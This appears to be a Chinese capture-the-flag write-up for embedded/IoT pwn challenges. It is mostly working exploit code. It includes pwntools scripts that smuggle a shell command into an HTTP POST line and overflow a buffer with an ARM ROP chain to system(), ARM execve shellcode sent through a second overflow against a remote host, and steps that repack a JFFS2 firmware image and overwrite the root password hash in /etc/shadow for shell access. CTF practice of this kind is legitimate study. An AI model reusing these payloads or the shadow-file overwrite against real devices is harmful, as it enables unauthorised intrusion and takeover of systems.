更新中…结营赛还有非常多值得探索的东西
Pwn1: easyserver
串口看输出
from pwn import *
#context.log_level = 'debug'
p = remote('20.21.2.27', 59816)
pop_r0_pc = 0x0006099c
cmd_base = 0x008ACE4
system = 0x00019158
cmd = 'cat /tmp/207775d1ee9b9efa245fd9fb6fc03b68/flag'
payload = 'POST ./ HTTP1.1;'+cmd+'; \r\n'
payload += 'a'*1100+p32(pop_r0_pc)+ p32(cmd_base+13) + p32(system) +cyclic(100)+'\r\n'+'\r\n'+'\r\n'
print payload
p.send(payload)
p.interactive()
Pwn3: babyhttpd
串口看输出
from pwn import *
#context.log_level = 'debug'
context(arch='arm')
# shellcode = asm('''
# add r4, pc, #56
# str r4, [sp, #8]
# sub r2, r2, r2
# strb r2, [r4, #4]
# sub r2, r2, r2
# add r3, pc, #28
# str r3, [sp, #4]
# str r2, [sp, #12]
# mov r0, r3, lsl r2
# strb r2, [r3, #7]
# add r3, pc, #4
# add r1, sp, #4
# strb r2, [r3, #1]
# swi 0x90ff0b
# ''')+'/bin/ls//tmp'
shellcode = asm('''
add r4, pc, #60
str r4, [sp, #8]
sub r2, r2, r2
strb r2, [r4, #25]
sub r2, r2, r2
add r3, pc, #28
str r3, [sp, #4]
str r2, [sp, #12]
mov r0, r3, lsl r2
strb r2, [r3, #8]
add r3, pc, #4
add r1, sp, #4
strb r2, [r3, #1]
swi 0x90ff0b
''')+'/bin/cat/////tmp/ffffffllllaaaaaagggg'
p = remote('20.21.2.27', 5000)
payload = 'POST /'+"\x11"*6+shellcode+'\r\n\r\n'
payload += 'name='+'a'*655+p32(0x22504)+'&bbb=./;'
p.send(payload)
p.interactive()
板子拿shell
jffs2解包
# Install jefferson to extract JFFS2 file systems
$ sudo pip install cstruct
$ git clone https://github.com/sviehb/jefferson
$ (cd jefferson && sudo python setup.py install)
binwalk -Me test.img
jffs2打包
sudo apt install mtd-utils
mkfs.jffs2 -r rootfs -o rootfs.img
修改start.sh
#!/bin/sh
cp -r /etc /tmp/
echo 'root:$1$NqxdI63c$nzvMkcJxzktGW6Tsgw3jb0:1::::::' > /tmp/etc/shadow
mount -o loop /tmp/etc/ /etc